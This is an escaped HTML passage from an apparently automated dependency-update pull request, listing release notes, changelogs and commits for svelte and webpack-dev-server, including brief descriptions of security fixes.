header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.2...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `svelte` from 4.2.20 to 5.55.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/releases\"\u003esvelte's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esvelte@5.55.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: unlink errored and otherwise finished batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18264\"\u003e#18264\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eperf: walk composedPath() directly in delegated event propagation (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18268\"\u003e#18268\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: transfer effects when merging batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18254\"\u003e#18254\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e$derived(await ...)\u003c/code\u003e in disconnected effect roots (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18273\"\u003e#18273\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: remove temporary raw-text hydration markers (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18269\"\u003e#18269\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: propagate async \u003ccode\u003e@const\u003c/code\u003e blockers through closure references so template expressions like \u003ccode\u003e{(() =\u0026gt; host)()}\u003c/code\u003e correctly wait for the awaited value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18309\"\u003e#18309\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: properly unlink batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18298\"\u003e#18298\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: settle discarded batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18290\"\u003e#18290\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: declare \u003ccode\u003elet:\u003c/code\u003e directives before \u003ccode\u003e{@const}\u003c/code\u003e declarations on slotted elements (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18271\"\u003e#18271\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resume outro-ed branches if they were kept around (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18291\"\u003e#18291\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18297\"\u003e#18297\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly coordinate component-level effects inside async blocks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18260\"\u003e#18260\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make unnecessary commit work less likely (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18263\"\u003e#18263\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: add tag name to \u003ccode\u003ea11y_click_events_have_key_events\u003c/code\u003e warning (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18272\"\u003e#18272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: catch rejected promises while merging/committing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18266\"\u003e#18266\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.55.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't unset batch when calling \u003ccode\u003e{#await ...}\u003c/code\u003e promise (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: promise-ify \u003ccode\u003e{#await await ...}\u003c/code\u003e expressions on the server and correctly hydrate them on the client (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: deduplicate dependencies that are added outside the init/update cycle (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid false-positive batch invariant error (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18246\"\u003e#18246\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: inline primitive constants in attribute values during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18232\"\u003e#18232\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esvelte@5.55.8\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix(print): handle \u003ccode\u003esvelte:body\u003c/code\u003e and fix keyframe percentage double-printing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18234\"\u003e#18234\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/svelte/blob/main/packages/svelte/CHANGELOG.md\"\u003esvelte's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.55.10\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: unlink errored and otherwise finished batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18264\"\u003e#18264\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eperf: walk composedPath() directly in delegated event propagation (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18268\"\u003e#18268\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: transfer effects when merging batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18254\"\u003e#18254\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: allow \u003ccode\u003e$derived(await ...)\u003c/code\u003e in disconnected effect roots (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18273\"\u003e#18273\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: remove temporary raw-text hydration markers (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18269\"\u003e#18269\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: propagate async \u003ccode\u003e@const\u003c/code\u003e blockers through closure references so template expressions like \u003ccode\u003e{(() =\u0026gt; host)()}\u003c/code\u003e correctly wait for the awaited value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18309\"\u003e#18309\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: properly unlink batches (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18298\"\u003e#18298\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: settle discarded batch (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18290\"\u003e#18290\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: declare \u003ccode\u003elet:\u003c/code\u003e directives before \u003ccode\u003e{@const}\u003c/code\u003e declarations on slotted elements (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18271\"\u003e#18271\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: resume outro-ed branches if they were kept around (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18291\"\u003e#18291\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18297\"\u003e#18297\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: correctly coordinate component-level effects inside async blocks (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18260\"\u003e#18260\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: make unnecessary commit work less likely (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18263\"\u003e#18263\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003echore: add tag name to \u003ccode\u003ea11y_click_events_have_key_events\u003c/code\u003e warning (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18272\"\u003e#18272\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: catch rejected promises while merging/committing (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18266\"\u003e#18266\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.55.9\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003efix: don't unset batch when calling \u003ccode\u003e{#await ...}\u003c/code\u003e promise (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: promise-ify \u003ccode\u003e{#await await ...}\u003c/code\u003e expressions on the server and correctly hydrate them on the client (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: deduplicate dependencies that are added outside the init/update cycle (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18243\"\u003e#18243\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: avoid false-positive batch invariant error (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18246\"\u003e#18246\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003efix: inline primitive constants in attribute values during SSR (\u003ca href=\"https://redirect.github.com/sveltejs/svelte/pull/18232\"\u003e#18232\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.55.8\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0bb715d3cfe51134756e79b6193dacccfa77361f\"\u003e\u003ccode\u003e0bb715d\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18255\"\u003e#18255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/49538608356eabc74fc182b03449112a4fa1f12d\"\u003e\u003ccode\u003e4953860\u003c/code\u003e\u003c/a\u003e chore: remove unused class property (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18307\"\u003e#18307\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/638ab370a561f97552229589f2f334655426fe5c\"\u003e\u003ccode\u003e638ab37\u003c/code\u003e\u003c/a\u003e fix: prevent batch unlinking twice (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18303\"\u003e#18303\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/0da9f9e2ab515da16d624c5bc48b554beb179f92\"\u003e\u003ccode\u003e0da9f9e\u003c/code\u003e\u003c/a\u003e fix: disallow effect creation after \u003ccode\u003eawait\u003c/code\u003e (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18299\"\u003e#18299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/d4be4e297365030b5cbcb676bda133f2840816b2\"\u003e\u003ccode\u003ed4be4e2\u003c/code\u003e\u003c/a\u003e chore: ensure treeshaking test runs during CI (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18302\"\u003e#18302\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/e705369dee060e74ad9456e45824f36b1ee3c6cf\"\u003e\u003ccode\u003ee705369\u003c/code\u003e\u003c/a\u003e fix: propagate async \u003ca href=\"https://github.com/const\"\u003e\u003ccode\u003e@​const\u003c/code\u003e\u003c/a\u003e blockers through closure references (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18309\"\u003e#18309\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/ec08dbc7ee156d34816586feb49bb8650579e41f\"\u003e\u003ccode\u003eec08dbc\u003c/code\u003e\u003c/a\u003e fix: only unlink batch if we're done with it (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18298\"\u003e#18298\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/b40c359d44196b7b87745259243333763ed61ec5\"\u003e\u003ccode\u003eb40c359\u003c/code\u003e\u003c/a\u003e fix: don't assume boundary exists during increment/decrement (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18289\"\u003e#18289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/c01e598fff2a851323fb61c6325ef51b87f019fd\"\u003e\u003ccode\u003ec01e598\u003c/code\u003e\u003c/a\u003e fix: avoid waterfall-warning when async resolves to same value (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18297\"\u003e#18297\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/svelte/commit/070a0c4f7708ae0caa209ff762d98c0f117e6adb\"\u003e\u003ccode\u003e070a0c4\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;perf: use Set instead of Array for constant lookups in utils.js\u0026quot; (\u003ca href=\"https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte/issues/18\"\u003e#18\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/sveltejs/svelte/commits/svelte@5.55.10/packages/svelte\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for svelte since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 4.15.2 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca 